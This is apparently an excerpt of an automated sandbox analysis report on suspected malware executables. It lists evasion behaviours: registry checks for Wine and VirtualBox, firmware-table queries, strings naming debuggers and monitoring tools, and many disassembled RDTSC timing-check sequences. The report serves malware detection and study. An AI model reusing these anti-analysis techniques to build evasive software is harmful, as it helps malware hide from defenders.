Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_3-9744

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D17 second address: D17D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 jnp 00007F6969412EA6h 0x0000000d jnp 00007F6969412EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E95 second address: D17EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6968D54749h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17EB6 second address: D17EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6969412EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17EC2 second address: D17EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17EC6 second address: D17EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6969412EB5h 0x0000000f jg 00007F6969412EA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B2E9 second address: D1B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B2EF second address: D1B2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6969412EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B44C second address: D1B452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B452 second address: D1B480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jg 00007F6969412EB3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6969412EADh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B480 second address: D1B49A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F6968D5473Ch 0x00000014 jnl 00007F6968D54736h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B49A second address: D1B4D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F6969412EA6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d call 00007F6969412EADh 0x00000012 xor cx, BEC6h 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1246025Ch] 0x0000001e mov edx, dword ptr [ebp+122D2CE3h] 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6969412EADh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B594 second address: D1B5AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D54738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6968D5473Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B5AF second address: D1B5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6969412EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B5B9 second address: D1B649 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2F3Bh] 0x00000013 mov dword ptr [ebp+122D30EAh], esi 0x00000019 push 00000000h 0x0000001b adc di, 81FBh 0x00000020 mov dword ptr [ebp+122D31B5h], eax 0x00000026 push 75611D31h 0x0000002b push ecx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jno 00007F6968D54736h 0x00000035 popad 0x00000036 pop ecx 0x00000037 xor dword ptr [esp], 75611DB1h 0x0000003e mov edx, dword ptr [ebp+122D2DD3h] 0x00000044 push 00000003h 0x00000046 push 00000000h 0x00000048 mov esi, eax 0x0000004a push 00000003h 0x0000004c mov edi, dword ptr [ebp+122D2F67h] 0x00000052 call 00007F6968D54739h 0x00000057 je 00007F6968D5474Eh 0x0000005d jng 00007F6968D54748h 0x00000063 jmp 00007F6968D54742h 0x00000068 push eax 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F6968D54743h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B649 second address: D1B666 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F6969412EA6h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B666 second address: D1B66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B66C second address: D1B69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6969412EB5h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6969412EB1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B69E second address: D1B6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B6A4 second address: D1B6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6969412EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B6AE second address: D1B6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B791 second address: D1B796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B796 second address: D1B7E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6968D54749h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007F6968D5474Eh 0x00000014 push ebx 0x00000015 jmp 00007F6968D54746h 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007F6968D5473Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B7E8 second address: D1B82A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6969412EBFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F6969412EB9h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B8D7 second address: D1B8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1B8DC second address: D1B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1B0E06AAh 0x00000010 mov ecx, ebx 0x00000012 lea ebx, dword ptr [ebp+12460270h] 0x00000018 push esi 0x00000019 movzx edx, bx 0x0000001c pop esi 0x0000001d xchg eax, ebx 0x0000001e push esi 0x0000001f jl 00007F6969412EACh 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F6969412EACh 0x0000002f jl 00007F6969412EA6h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2C54F second address: D2C558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2C558 second address: D2C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2C55C second address: D2C575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F6968D5473Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C56A second address: D3C57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007F6969412EA6h 0x0000000c jp 00007F6969412EA6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C57F second address: D3C587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C587 second address: D3C59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F6969412EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C59C second address: D3C5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFCA68 second address: CFCA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A447 second address: D3A44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A58C second address: D3A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A590 second address: D3A59D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A59D second address: D3A5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A7F4 second address: D3A819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 jnp 00007F6968D54736h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F6968D5473Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A819 second address: D3A837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6969412EB8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A976 second address: D3A99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6968D54748h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A99A second address: D3A9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6969412EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6969412EABh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A9B7 second address: D3A9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A9BC second address: D3A9D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB4h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3ADD3 second address: D3ADD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3ADD7 second address: D3ADDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3ADDD second address: D3ADF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6968D54742h 0x0000000c jl 00007F6968D54736h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3ADF1 second address: D3ADF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B240 second address: D3B262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6968D54736h 0x0000000a popad 0x0000000b jmp 00007F6968D5473Fh 0x00000010 jc 00007F6968D54742h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B3F2 second address: D3B3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F6969412EA6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B5C0 second address: D3B5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D54742h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32548 second address: D32568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB6h 0x00000009 jc 00007F6969412EA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32568 second address: D3256C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3256C second address: D32572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C0F2 second address: D3C0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C0F8 second address: D3C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C0FC second address: D3C105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C105 second address: D3C13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6969412EAEh 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F6969412EB2h 0x00000013 jmp 00007F6969412EAEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DB4E second address: D3DB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6968D54736h 0x0000000a jmp 00007F6968D5473Bh 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 jng 00007F6968D54742h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DB74 second address: D3DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF9547 second address: CF954D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D420B9 second address: D420BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D433D6 second address: D433DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06EFB second address: D06F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06F03 second address: D06F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jno 00007F6968D5473Eh 0x00000013 push esi 0x00000014 jg 00007F6968D54736h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48D91 second address: D48DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48DA1 second address: D48DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48DA7 second address: D48DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB6h 0x00000007 jg 00007F6969412EA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F6969412EB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48DE0 second address: D48DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49096 second address: D490B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F6969412EAAh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F6969412EA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49E7B second address: D49E93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6968D5473Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49E93 second address: D49EB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6969412EB4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49EB6 second address: D49EDB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007F6968D5473Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F6968D54738h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49EDB second address: D49F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F6969412EA8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push EACE04C4h 0x00000029 pushad 0x0000002a jmp 00007F6969412EB1h 0x0000002f pushad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4A634 second address: D4A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
